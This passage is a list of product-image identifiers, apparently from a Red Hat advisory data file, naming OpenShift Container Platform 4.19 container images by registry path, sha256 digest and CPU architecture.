"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
